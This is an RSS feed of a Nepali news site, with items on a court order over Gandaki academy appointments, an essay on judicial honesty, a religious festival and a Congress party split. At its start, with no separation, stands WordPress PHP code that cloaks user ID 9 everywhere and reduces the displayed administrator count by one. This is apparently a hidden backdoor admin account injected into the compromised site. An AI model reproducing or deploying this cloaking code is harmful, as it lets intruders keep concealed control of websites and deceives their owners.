add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
राष्ट्रिय समाचार – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSat, 25 Jul 2026 11:50:29 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgराष्ट्रिय समाचार – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232गण्डकी प्रज्ञा–प्रतिष्ठानमा पदाधिकारी मनोनयन खारेजी माग रिटमा उच्च अदालतद्वारा कारण देखाऊ आदेश जारी
https://www.antaranganews.com/?p=50293
https://www.antaranganews.com/?p=50293#respondSat, 25 Jul 2026 11:39:18 +0000https://www.antaranganews.com/?p=50293पोखरा– गण्डकी प्रज्ञा–प्रतिष्ठानमा पदाधिकारी मनोनयन खारेजीको माग गर्दै परेको रिटमा अदालतले कारण देखाऊ आदेश जारी गरेको छ । गण्डकी सरकार मातहत रहेको गण्डकी प्रज्ञा–प्रतिष्ठानमा भएको पदाधिकारी नियुक्तिलाई खारेज गर्न माग गर्दै दायर रिटमा कारण देखाऊ आदेश साउन ७ गते जारी भएको हो ।
उच्च अदालत पोखरामा सो सम्बन्धमा परेको रिटमा दुईतर्फी बहस सुने पछि त्यस्तो आदेश दिएको हो । उच्च अदालत पोखराका मुख्य न्यायाधीश डा. रत्नबहादुर बागचन्दको इजलासले प्रारम्भिक सुनुवाई पछि प्रत्यर्थीहरूको नाममा कारण देखाऊ आदेश जारी गरेको हो । गण्डकी प्रज्ञा– प्रतिष्ठानमा पदाधिकारी तथा सदस्यहरूको नियुक्ति समावेशी सिद्धान्तविपरीत भएको भन्दै दायर रिटमा उच्च अदालत पोखराले विपक्षीहरूका नाममा कारण देखाऊ आदेश जारी गरेको हो । अदालतले विपक्षीहरूलाई १५ दिनभित्र लिखित जवाफ पेस गर्न आदेश दिँदै अन्तरिम आदेशबारे निर्णय लिन आउँदो साउन ११ गते छलफलका लागि दुवै पक्षलाई बोलाएको छ ।
गण्डकी प्रज्ञा–प्रतिष्ठानमा गत २२ असारमा सत्ता साझेदार नेकपा एमाले र काङ्ग्रेसबाट दलगत भगवण्डाका आधारमा सिफारिस समितिको सिफारिस बमोजिम प्रदेश सरकारले २४ सदस्यीय पदाधिकारी मनोनित गरेको थियो । यसअघि १४ महिना ९ दिन सो प्रतिष्ठान पदाधिकारी विहीन थियो ।
गण्डकी प्रज्ञा–प्रतिष्ठान ऐन, २०७६ को दफा ८ मा प्रदेशको भाषा, साहित्य, संस्कृति र कलाको संरक्षणका लागि सम्भव भएसम्म सबै जाति तथा भाषाभाषीलाई समेटेर सिफारिस गर्नुपर्ने स्पष्ट व्यवस्था छ । निवेदकबाट संविधानको समानुपातिक समावेशी सिद्धान्तको बर्खिलाप हुने गरी गरिएको उक्त नियुक्ति निर्णय खारेज गर्न र दलित समुदायको प्रतिनिधित्व सुनिश्चित गराउन परमादेशको माग भएको छ ।
त्यसका लागि सामाजिक विकास युवा तथा खेलकुद मन्त्रालयको २०८२ वैशाख २५ गतेको निर्णय अनुसार वैशाख २७ गते प्राज्ञ आह्वानका लागि प्रकाशित सूचनाको मर्म विपरित मन्त्रालयले बनाएको कार्यविधि अनुसार आफ्नो विधा विकास योजना पेश गर्ने सामथ्र्यसमेत नभएका पदाधिकारी नियुक्त गरेकोमा आपत्ती व्यक्त गर्दै रिट दायर भएको हो ।
पोखरा– ३, नदीपुर निवासी अधिकारकर्मी उमेश सि.के.ले दलित तथा मगर समुदायको एकजना पनि प्रतिनिधित्व नगराई राजनीतिक भागबण्डा आधारमा मनोमानी ढंगले पदाधिकारी मनोनयन गरिएको भन्दै उत्प्रेषणयुक्त परमादेशको रिट दायर गर्नु भएको हो । नवनियुक्त पदाधिकारीहरूले भने शपथ ग्रहणसमेत गरिसकेका छन् ।
उक्त मुद्दामा गण्डकी प्रदेश सरकार मुख्यमन्त्री तथा मन्त्रिपरिषद्को कार्यालय, मुख्यमन्त्री सुरेन्द्रराज पाण्डे, गण्डकी प्रदेश सामाजिक विकास, युवा तथा खेलकुद मन्त्रालय, सोही मन्त्रालयका मन्त्री रेखा गुरुङसमेत प्रतिष्ठानमा नवनियुक्त पदाधिकारी तथा सदस्यसमेत गरी २९ जनालाई विपक्षी बनाइएको छ ।
प्रारम्भिक सुनुवाइमा अदालतले विपक्षीहरू मुख्यमन्त्री कार्यालय, मुख्यमन्त्री पाण्डे, सामाजिक विकास मन्त्रालय तथा मन्त्री गुरुङको हकमा मुख्य न्यायाधिवक्ताको कार्यालय, पोखरामार्फत र अन्य विपक्षीहरूको हकमा १५ दिनभित्र आफैँ वा आफ्ना कानूनबमोजिमको प्रतिनिधिमार्फत लिखित जवाफ पेस गर्नु भनी आदेश दिएको छ । साथै, रिट निवेदकले अन्तरिम आदेशसमेत जारी गरी पाउन माग गरेकाले अन्तरिम आदेश जारी गर्नेबारे छलफलका लागि पेसी तोकेको छ ।
निवेदक सि.के.ले करिब १८ प्रतिशत मगर तथा १९ प्रतिशत दलित समुदाय रहेको गण्डकी प्रदेशमा संविधानको समानुपातिक समावेशीसमेतको सिद्धान्तको बर्खिलाप हुने गरी प्रतिष्ठानमा सहभागिताबाट वञ्चित गराइएकोमा उत्प्रेषणको आदेशले खारेजसहित दलित समुदायको प्रतिनिधित्व हुनुपर्ने जिकिर गरी परमादेश माग गरेका छन् । साथै, सुविधा र सन्तुलनका हिसाबले अन्तरिम आदेशको माग गरिएको छ ।
प्रतिष्ठानको विवादित समितिको कुलपति प्रा.डा. कुसुमाकर न्यौपाने, उपकुलपति शंकरविरही गुरुङ र सदस्य–सचिव मनकुमार श्रेष्ठसहित २४ सदस्यीय प्राज्ञ सभा सदस्य मनोनीत गरिएको थियो । प्राज्ञ सभामा सत्तासमीकरण अनुसार नेपाली कांग्रेस र नेकपा (एमाले) बीच भागबण्डा गरिएको भन्दै बाहिरसमेत आलोचना भइरहेको छ ।
उक्त रिट निवेदककातर्फबाट अधिवक्ताद्वय महेन्द्रमान व्यथित र विजय नेपालले बहस गर्नु भएको थियो ।
]]>
https://www.antaranganews.com/?feed=rss2&p=502930ईश्वर जस्तै न्यायाधीश भए गोलाप्रथा चाहिन्न
https://www.antaranganews.com/?p=50287
https://www.antaranganews.com/?p=50287#respondSat, 25 Jul 2026 07:05:01 +0000https://www.antaranganews.com/?p=50287ईश्वर जस्तै न्यायाधीश भए गाला प्रथा चाहिंदैन भन्ने कुरा बरिष्ठ अधिवक्ता प्रा.डा. तथा नेपाल बार एशोसिएसनका वर्तमान अध्यक्ष विजय मिश्रले कुनै कार्यक्रममा उल्लेख गरेका जानकारीमा आयो । त्यस प्रसंगमा पूर्व न्यायाधीश ईश्वरप्रसाद खतिवडाको नाम पनि आएको रहेछ । मैले न्यायाधीशहरूको बारेमा लेख्न छोडेको धेरै भयो । अहिले लेखौं जस्तो लाग्यो । उमेरको हिसावले सवै न्यायाधीशहरू म भन्दा कान्छा हुनुहुन्छ र मानको हिसाबले इश्वर जस्तै हुनुहुन्छ । भगवान राम भन्दा जेठाहरू उनका नोक्करहरू पनि थिए र जेठा हुंदैमा भागवान राम भन्दा मानिस ठूलो हुंदैन । न्यायाधीशहरूको न्यायपूर्ण काम मात्र भगवानको जस्तो हो, मानिस त हामी जस्तै हुन् । विजय मिश्रजीले उठाउनु भएको सत्य तथ्य यो हो कि गोला प्रथा कायम गर्नु भनेको नै न्यायाधिशहरू भ्रष्ट छन् भन्नु हो । अन्यथा न्यायाधीशहरू असल भएको भए र इमान्दार भएको भए गोला प्रथा किन चाहिन्थ्यो । सत्य तथ्य यो पनि हो कि न्यायाधीशहरू अहिले पनि धेरै जसो इमान्दार छन् तर त्यो इमान्दारीले इमान र न्यायलाई जोगाउन कठिन हुन्छ । यसका केही कारण छन् ।
जिल्ला अदालतमा फैसला गर्दा बेइमान न्यायाधीशको इजलासमा मुद्धा नपरेसम्म पेशी सार्ने हो भने करिव ७÷८ पटकसम्म मुद्धा हटाउन सकिन्छ । अर्थात ८ जना न्यायाधीशमा एक जना मात्र बेइमान भए पनि अन्याय पर्ने संभावना भयो । उच्च अदालतमा पनि एभरेजमा ५ बटा डिभिजन बेन्च मान्दा पनि आफ्नो कुरा पुरा हुने इजलासमा मुद्धा नपुगे सम्म पेशी सार्न सकिन्छ । सर्बोच्च अदालतमा पनि १० बटा इजलास हुने हुंदा नब्बे प्रतिसत न्यायाधीश इमान्दार भए पनि बेइमानले फाइदा लिन सक्छन् । यद्यपि अधिकांस मुद्धाहरू प्रमाणको प्रष्टताको आधारमा नै निक्र्याैल हुन्छन् । केही मध्येका पनि केही मुद्धाहरू मात्र पहुंच हुनेहरूले कानुनको दुपयोग गर्न सक्ने हुन् ।
जस्ले जे भने पनि जिल्ला अदालतमा रहने न्यायाधीशहरू विविध कारणले धेरै जसो इमान्दार भएको देखिन्छ । प्रमाण बुझ्ने समेतका कार्यहरूमा इमान्दार रहेको पनि देखिन्छ र त्यो स्वभाविक हो । तर धेरै बेथिति र अज्ञानताले गांँजेमा न्यायालय जस्तो देखिन्न । गल्ती गर्ने न्यायाधिसहरुले बिबाद र बिरोध भएन भन्दैमा गल्ती ढाकियो भन्ने पनि सोच्न हुंदैन । गल्ती उजागर नगर्नुको कारण अदालतको अबहेलना, मुद्धामा असर गर्ने र कानुन व्यवसायीहरूलाई न्यायाधीश नकारात्मक भएमा पछि पनि मुद्धा बिग्रन्छन् भन्ने भावना हुनु पनि हो ।
प्रसंग संपत्ति विवरण न्यायाधीशहरूले बुझाउने बारे हो । इश्वर खतिवडा जस्ता न्यायाधीशहरूको संपत्ति विवरण हेर्दा र तिलप्रसाद श्रेष्ठ जस्ता न्यायाधीशहरूको अवस्था हेर्दा न्यायाधीशहरू प्रति सम्मानले सिर निहुरन्छ । त्यस्ता न्यायाधीशहरू अरु पनि धेरै हुनुहुन्छ । त्यस्ता न्यायाधीशहरुको उदाहरण दिएर अरु न्यायाधीशहरूलाई पनि उन्मुक्ति दिने हो भने बेइमानहरूले फाइदा लिन सक्नु स्वभाबिक हो । उदाहरण राम्रो गर्नको लागि हुन्छ, नराम्रोलाई प्रत्यक्ष वा परोक्ष रुपमा उन्मुक्ति दिनको लागि हुनु हुंदैन । सबै इमान्दार न्यायाधीश ज्युहरुले यसमा ध्यान दिनै पर्छ । उहाँहरूले आफ्नो इमान्दारी तौलन तयार भएमा बेइमानहरुलाई कठिन हुने छ । आंँखा चिम्लेर अंध्यारो छ, मैले जे गरे पनि केही हुंदैन र कसैले थाहा पाउंदैन भनेर जे पनि गर्न हुंदैन । मानिसले बाच गरिरहेका हुन्छन् ।
जिल्ला अदालतमा कुनै व्यक्तिले एक बिषयमा हक कायम मुद्धा दिएको छ । त्यो मुद्धबाट नै सजिलैसंग आफ्नो भनाइ राख्न पाइने अवस्था छ । तर उसले उच्च अदालतमा रिट दियो । अर्को पक्षका कानुन व्यवसायीले यो बिषयमा मुद्धा चलिरहेको छ र त्यसै मुद्धामा सजिलैसंग यो बिषय राख्न सकिन्छ भनिरहेका छन् । त्यस मुद्धामा नै मुलुकी देवानी कार्यविधि संहिता २०७४ को दफा १५६, १५७, १५८ समेत अनुसार जिल्ला न्यायाधीशले उचित आदेश दिन सक्ने स्वभाविक र सजिलो एवम् प्रमाणको आधारमा अझै राम्रो अवसर हुन्छ । साथै त्यो आदेशमा चित्त नबुझ्ने पक्ष उच्च अदालतमा जान सक्ने अवस्था हुन्छ । स्वभावैले रिट भनेको साधारण अधिकार क्षेत्रबाट जांदा ढिलो हुने, विकल्प नभएको समेत अवस्थामा प्रयोग हुने हो । उच्च अदालतले जिल्ला अदालतमा मुद्धा चल्दा चल्दै रिट जारी गरेमा जिल्ला अदालतको उसैले दिएको मुद्धाको हैसियत के हुने ? यसमा पनि न्यायाधीशले ध्यान नदिए के होला ?
कुनै कानुन व्यवसायीले मुद्धामा पेशी सार्न निवेदन दिंदा १० पटक सम्म पनि मुद्धा सरेका र कुनै कानुन व्यवसायीले पहिलो पटक पेशी सार्न निवेदन दिंदा पनि अभियान, ढिलो आएको आदि भनेर फैसला गरेका घटना पनि सुनिए भने सामान्य मानिसले के अनुमान गर्लान् ? अझै प्रष्ट रुपमा अदालतको अधिकार क्षेत्र, हदम्याद र हकदैया जस्ता सवाल उठेकोमा ती भनाइहरूको सम्वन्धमा केही नबोली जिल्लामा फैसला हुन्छ र उच्च अदालतले पनि सुरु सदर गर्छ भने न्यायको ढोका सर्वोच्चमा मात्र खुल्छ कि ¤ भनेर आशा गर्न पर्ने हुन्छ । सर्वोच्च अदालत पनि मुद्धाले थिचिएको भए न्याय पर्ने भए पनि साह्रै ढिलो हुन्छ । ढिलो न्याय दिन न्याय नदिनु बरावर हो भनिन्छ ।
अझै सम्वन्धित मुद्धामा जुन काम भएको हो त्यो कामको दावी नै छैन, त्यस्तो मुद्धामा दावी नै नभएको बिषयमासमेत अर्थात अर्को क्रमको व्यवहारलाई मानेर दावी भन्दा बाहिर गएर फैसला भएको छ भने त्यो कति दुर्भाग्यपूर्ण होला ? हामीहरूले कपडा नलगाएर आंँखा चिम्लेर कपडा नलगाएको देखेका छैनौं भनेर अरुले पनि हामी नांगै भएको देख्दैनन् भन्ने होइन ।
यदि मुद्धा फैसला गर्दा कमसेकम कुनै पक्षले उठाएका हदम्याद, हकदैया र क्षेत्राधिकारका विषयहरू फैसलामा एक वाक्यमा नै भने पनि सम्बोधन हुने परंपराले इमान्दारहरू अझै इमान्दार भन्ने प्रष्ट हुन्छ र बेइमानहरू उनीहरूले आँंखा चिम्ले पनि नांगै देखिन्छन् । मेरो उमेरले पनि न्यायाधीशहरू प्रति उजुर दिने चाहाना तिर लग्दैन । तर कसैले स्थान दिन्छ भने बोलेर धेरै सत्य सुनाउन पनि सक्छु भन्ने पनि धेरै हुन्छन् ।
सबैभन्दा उपल्लो अदालतमा पनि पैतृक सम्पत्ति पनि अंश नलाग्ने, संगोलमा रहंदा मोही भएको जग्गा पनि मानो छुट्टिएको मिति न्यायाधीश आफैले उल्लेख गरेर धेरैपछि अंश मुद्धा पर्दा समेत अंश नलाग्ने गरेर फैसला भयो भने र त्यो पनि पुनरावलोकन तहमा फैसला भयो भने त न्याय पुरै मर्छ । फैसलाले फाइदा हुने पक्षको कानुन व्यवसायी नै पछि सर्बोच्च अदालतमा न्यायाधीश छन् र उनको प्रभावमा अरु न्यायाधीशहरूले त्यस्तो गरेको देखिने प्रष्ट अवस्था आएमा ती न्यायाधीशहरूले सूर्यलाई हातले छेकेर अंँध्यारो बनाउन खोजे जस्तो देखिदैन र ? कमसेकम न्यायाधीशहरूले कुनै समयमा हामी पनि रिटायर हुन्छौं र जनताले विषेशत कानुन क्षेत्रकाहरूले हामीहरूले गरेका गल्ती त्यतिबेला भने पनि औल्याए भने मलाई कति लाज होला भन्ने सोचे पुग्छ ।
केवल अदालतको अबहेलनाको छडीले मात्र अदालतको अबहेलनाको अन्त्य हुंदैन । बलियोले गल्ती गर्ने तर गल्ती देखाएमा तंलाई दुःख दिन्छु भनेर गल्तीको बचाव गर्नु भन्दा असल बनेर सवै न्याय क्षेत्रमा काम गर्नेहरूले न्यायलय यस्तो हुन पर्छ भन्ने उदाहरण दिन सक्ने भएमा पो राम्रो होला । कानुन व्यवसायी, न्यायाधीश, अख्तियार समेत सर्बत्रका व्यक्तित्वहरूले मरेपछि त आफूसंग केही जांदैन र गल्ती गरेको भए यहाँ पछिसम्म पनि गलत भन्ने जानकारी रहन्छ । केवल न्यूनतम आधारभुत आबश्यकता पुरा भएपछि सम्पत्ति ज्यादा हुंदैमा सुनको चामल खाने होइन भन्ने मानसिकता सवैमा भइ दिए कति राम्रो हुने थियो ।
सायद २५ बर्ष पहिलाको कुरा हो । गरिव अमरिखन सहनी भन्ने मानिसको जग्गा धनीले कब्जा गरेछन् । धनीले नापीमा भएको नक्सा बिगार्ने र कपडाको नक्सामा समेत चुरोटले प्वाल पारेर नक्सामा उनको जग्गामा त्यो गरिवको जग्गा पारेछन् । जिल्लामा अमरिखनले हारेछ, पुनरावेदन तहमा पनि हारेछन् । पुनरावेदन तहमा मुद्धा चल्दा कतैबाट पुरानो प्रमाणित नक्सा पाएछन् । त्यस नक्सामा प्रष्टत केही जग्गा उही अमरिखन सहनीको देखिने तर धनीले बिगारेको देखियो । नापी कार्यालयले पनि सुधार ग¥यो । विवादित जग्गा अमरिखन सहनीको नै देखिने गरेर नक्सा सुधार भयो । सर्बोच्च अदालतमा प्रकाश ओस्ती श्रीमान भएको इजलासमा मुद्धा प¥यो । उहांँले यस्तो अन्याय भनेर तुरुन्त मिसिल झिकाउने आदेश गर्नु भयो । मिसिल झिकाउने काम भयो । त्यसपछि पहिला कानुन व्यवसायी नै भएका एक जना न्यायाधीशकोमा मुद्धा प¥यो । उनीपछि प्रधान न्यायाधीश पनि भए । मैले बहस गरें । उनले मधेशमा जुंगाको लडाई भनेको यही हो । गाउंको जग्गाको मुल्य भन्दा मुद्धामा धरै ज्यादा खर्च भयो । बेक्कारमा दुःख दिन मुद्धा लड्छन् भन्दै मेरो पक्षलाई उनले हराए । अर्थात नक्सामा मेरो पक्षको भयो तर फैसला धनीको पक्षमा नै भयो ।
अब रहस्य यस्तो छ । अमरिखन गरिव व्यक्ति हो । २ बर्ष पहिला पनि उनलाई भेटेको थिए । सायद अहिले पनि होलान् । उनलाई धनीले अन्याय गरेको थाहा पाएपछि मैले उनको मुद्धा फिस नलिइ लेखेको थिए । सिमरावाट काठमाण्डौ जान त्यस समयमा छ सय भाडा थियो जस्तो लाग्छ । उनले मलाई जान र आउन गरी एक हजार दिन्थे । अरु खर्च मैले नै गरेको थिए । त्यो उनलाई अन्याय भएकोले मायाले भएको थियो । तर ती न्यायाधीशलाई मैले धेरै फिस लिएको भ्रम भएछ क्यारे । ती अम्रिखन सहनीलाई अहिले पनि सोध्न सकिन्छ, मैले फिस लिए कि ¤ लिइन भनेर । तर नक्सामा उनको जग्गा देखिए पनि ती न्यायाधीशले गर्दा फैसला धनीको पक्षमा गयो । ती न्यायाधीशले कपडा लगाएका छन् कि छैनन् भन्ने । म, अमरिखन सहनी र जिल्लामा लेख्ने र बहस गर्ने कानुन व्यवसायी प्रलाद गौतम, पुनरावेदन तहमा मुद्धा लिने बिनय मल्लिकसमेत केहीले अहिले पनि त्यो न्याय हो वा अन्याय हो, त्यसको महसुस त गर्ने नै भए । पदमा रहंदा पछिसम्म पनि घृणा कायम रहने कार्य कृपया कसैले पनि नगर्ने कि ? यसबाट कसैलाई अन्यथा भए माफ पाउं । मलाई मेरा न्यायाधीश इश्वर जस्तै चाहियो, गोला प्रथा गर्नु पर्ने चाहिएन । तर करिव ४७ बर्षको मेरो कानुन क्षेत्रको अनुभवको इतिहासमा यस्ता पिडाहरू बर्गेल्ती छन् । (लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिक को आज प्रकाशित अंकबाट साभार गरिएको हो । – सं.)
]]>https://www.antaranganews.com/?feed=rss2&p=502870आज हरिशयनी एकादशी : चतुर्मास व्रतको शुभारम्भ, घर– घरमा तुलसी रोपिँदै
https://www.antaranganews.com/?p=50279
https://www.antaranganews.com/?p=50279#respondSat, 25 Jul 2026 01:51:50 +0000https://www.antaranganews.com/?p=50279लमजुङ– आज सनातन वैदिक परम्पराअनुसार असार शुक्ल एकादशी अर्थात् हरिशयनी एकादशी । आज साउन ९ गतेबाट देशभरका हिन्दु धर्मावलम्बीले घर–घरमा तुलसीको बिरुवा मोठमा सारेर विशेष पूजाआराधना सुरु गरेका छन् भने आजैदेखि चतुर्मास व्रतको शुभारम्भ हुँदैछ ।
सनातन वैदिक परम्परा अनुसार तुलसीलाई विष्णुको प्रतीकका रुपमा मानिन्छ । एक महिनाअघि ज्येष्ठ शुक्ल एकादशीका दिन तयार पारिएको तुलसीको दल हरिशयनी एकादशीको अवसरमा तुलसीको मोठमा सार्ने परम्परा मान्यता रहेको छ । आजदेखि कार्तिक शुक्ल एकादशीका दिनसम्म तुलसीको विशेष पूजा हुन्छ । तुलसीलाई भगवान् विष्णुको प्रतीकका रूपमा मानिने भएकाले आजदेखि कार्तिक शुक्ल एकादशीसम्म चार महिनासम्म नियमित पूजा गर्ने प्रचलन छ ।
असार शुक्ल एकादशीदेखि भगवान् विष्णु क्षीरसागरमा शयन गर्ने धार्मिक विश्वास रहेकाले यस दिनलाई हरिशयनी एकादशी भनिन्छ । विष्णुको शयनकालका यी चार महिनालाई ‘चतुर्मास’ पनि भनिन्छ ।
वर्षभरिमा पर्ने २४ वटा एकादशीमध्ये धेरै श्रद्धालुले सबै एकादशीमा व्रत बस्ने गरे पनि नसक्नेहरूले चतुर्मासमा पर्ने आठ एकादशी वा हरिशयनी र हरिबोधिनी एकादशीमा मात्रै व्रत बस्ने परम्परा रहेको छ । एकादशीका दिन चामलबाट बनेका परिकार नखाई रोटी, ढिँडो तथा फलाहार ग्रहण गर्ने प्रचलन छ ।
चतुर्मासभर विधिपूर्वक पूजा गरिएको तुलसीको कार्तिक शुक्ल एकादशी अर्थात् हरिबोधिनी एकादशीका दिन भगवान् दामोदरसँग वैदिक विधिअनुसार विवाह गराइन्छ । त्यसपछि हवनसहित चतुर्मास व्रतको समापन गर्ने धार्मिक परम्परा रहेको छ ।
एक वर्षमा २४ एकादशी हुन्छन् । सक्नेले सबै एकादशीमा फलाहार मात्र गरेर व्रत बस्छन् । नसक्नेले चतुर्मासाका चार महिनामा पर्ने आठ एकादशीमा व्रत बस्ने गर्दछन् । कामकाजमा सक्रिय हुनुपर्ने र चार महिनासम्म पनि फलाहार गर्न नसक्नेले भने हरिशयनी एकादशी र हरिबोधिनी एकादशीका दिन फलाहार गरी व्रत बस्ने धार्मिक मान्यता रहेको छ ।
असार शुक्ल एकादशीका दिन रोपिएको तुलसी भगवान् विष्णु र विष्णुप्रियाका नामले चार महिनासम्म पूजा गर्ने परम्परा छ । यो अवधिलाई चतुर्मास भनिन्छ । कार्तिक शुक्ल (हरिबोधिनी) एकादशीमा तुलसीविवाह गरेपछि त्यसै पूर्णिमामा चतुर्मास सम्पन्न भएको मानिन्छ । तुलसी र दामोदरको विधिपूर्वक विवाहपछि अग्निस्थापना विधिबाट चतुर्मासा व्रतको उद्यापनका लागि हवनसमेत गर्ने प्रचलन छ ।
तुलसीलाई धार्मिक दुष्टिलेमा महत्वपूर्ण मानिएको नभई वैज्ञानिक दृष्टिले पनि उपयोगी वनस्पतिका रूपमा लिने गरिन्छ । तुलसीले वातावरण शुद्ध बनाउन, अक्सिजनको मात्रा बढाउन तथा विभिन्न रोगको घरेलु औषधिका रूपमा उपयोग हुने विश्वास गरिन्छ । घरमा तुलसीको मोठ राख्दा वातावरण सकारात्मक हुने र रोग सार्ने कीटाणु नष्ट हुने जनविश्वास समेत रहेको छ ।
आजको हरिशयनी एकादशी पर्वका अवसरमा काठमाडौंको बूढानीलकण्ठ, उपत्यकाका चार नारायणसहित देशभरका विष्णु तथा नारायण मन्दिरमा बिहानैदेखि भक्तजनको उल्लेख्य भिड लागेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=502790राष्ट्रिय मेलमिलापका प्रणेता विपीका चेलाहरूद्वारा उहाँकै स्मृति दिवसमा गरे छुट्टीने संकेत : कांग्रेस किचलोे ‘अल्टिमेटम’मा परिणत, साउन २९ समय सीमा
https://www.antaranganews.com/?p=50239
https://www.antaranganews.com/?p=50239#respondThu, 23 Jul 2026 02:46:02 +0000https://www.antaranganews.com/?p=50239काठमाडौं– राष्ट्रिय मेलमिलापका प्रणेता एवम् नेपाली काँग्रेसका संस्थापक नेता विपी कोइरालाका चेलाहरूद्वारा उहाँकै स्मृति दिवसमा छुट्टीने संकेत गरेका छन् । कांग्रेस किचलोे ‘अल्टिमेटम’मा परिणत भएको छ र साउन २९ समय सीमा निर्धारण गरिएको छ । विपीको ४४औं स्मृति दिवसको अवसरमा साउन ६ गते काँग्रेसका दुई समूहले छुट्टा छुट्टै मञ्चबाट त्यस्तो संकेत देखाएका हुन् ।
पछिल्लो समय चुनदेवीमा सम्पर्क कार्यालय खोलेर समानान्तर गतिविधि अगाडि बढाउँदै आएको समूहले बिपी स्मृति जयन्ती पनि अलग्गै गरेको हो । कमलादीस्थित प्रज्ञा भवनमा भेला भएको नेपाली कांग्रेसको संस्थापन इतर पक्षले कार्यक्रमको ब्यानरमै ‘एकता’ शब्द अंकित गरेको थियो । तर कार्यक्रममा बोल्ने बहुसंख्यक वक्ताले ‘लाचार नहुने, नयाँ कार्यदिशातिर अघि बढ्ने’ बताएर विभाजनको बाटो तय हुने चेतावनी दिएका हुन् । नेताहरूको त्यस्तो अभिव्यक्ति आउँदा हलमा उपस्थित सहभागीहरूले ताली र होहल्लासहित समर्थन व्यक्त गरेका छन् । ‘अब निर्णय सभापति गगन थापाले गर्नुपर्छ । यदि साउन २९ सम्म सम्मानजनक एकता भएन भने त्यसपछि कांग्रेसको राजनीति पुरानै लयमा अघि बढ्ने छैन । नयाँ दिशा निश्चित छ ।’ संस्थापन इतर पक्षका शीर्ष नेताहरूको अभिव्यक्ति थियो । उनीहरूले साउन २९ अघि सम्मानजनक एकता नभए नयाँ कार्यदिशाको बाटो तय हुने प्रष्ट सन्देश दिएका छन् ।
कांग्रेसको संस्थापन इतरपक्षले साउन २९ गते राष्ट्रिय भेला गर्ने घोषणा गरेको छ । नेता प्रकाशमान सिंहले भेलाको मिति साउन २९ र स्थान काठमाडौँ तय गरेको घोषणा गर्नु भएको हो ।
त्यसो त त्यो कार्यक्रममा सहभागी नेताहरू पूर्णबहादुर खड्का, विमलेन्द्र निधी, कृष्णप्रसाद सिटौला, डा. शशाङ्क कोइराला, डा. शेखर कोइराला लगायतले देशको अवस्था अत्यन्त जटिल अवस्थामा रहेको भन्दै यस्तो बेला पार्टीमा मतभेद होइन एकता गरेर अघि बढ्नुपर्नेमा जोड दिनु भएको थियो ।
विशेष महाधिवेशनबाट निर्वाचित सभापति गगन थापाको कार्यशैलीप्रति तीव्र असन्तुष्टि जनाउँदै शेरबहादुर देउवा र शेखर कोइराला पक्ष पछिल्लो समय एकै ठाउँ उभिँदै आएको छ ।
कांग्रेसभित्र यो संकट उत्पन्न हुनुको मुल कारण भने गत पुसमा सम्पन्न विशेष महाधिवेशन हो । निवर्तमान सभापति शेरबहादुर देउवा पक्षको असहमति र बहिष्कारबीच तत्कालीन महामन्त्रीद्वय गगन थापा र विश्वप्रकाश शर्माको नेतृत्वमा विशेष महाधिवेशन आयोजना भएको थियो ।
कार्यक्रममा निवर्तमान कार्यवाहक सभापति पूर्णबहादुर खड्काले कांग्रेसभित्रको अहिलेको संकट कुनै व्यक्तिगत असन्तुष्टि नभई राजनीतिक वैधता, आत्मसम्मान र संगठनात्मक मर्यादासँग जोडिएको विषय भएको दाबी गर्नुभयो ।
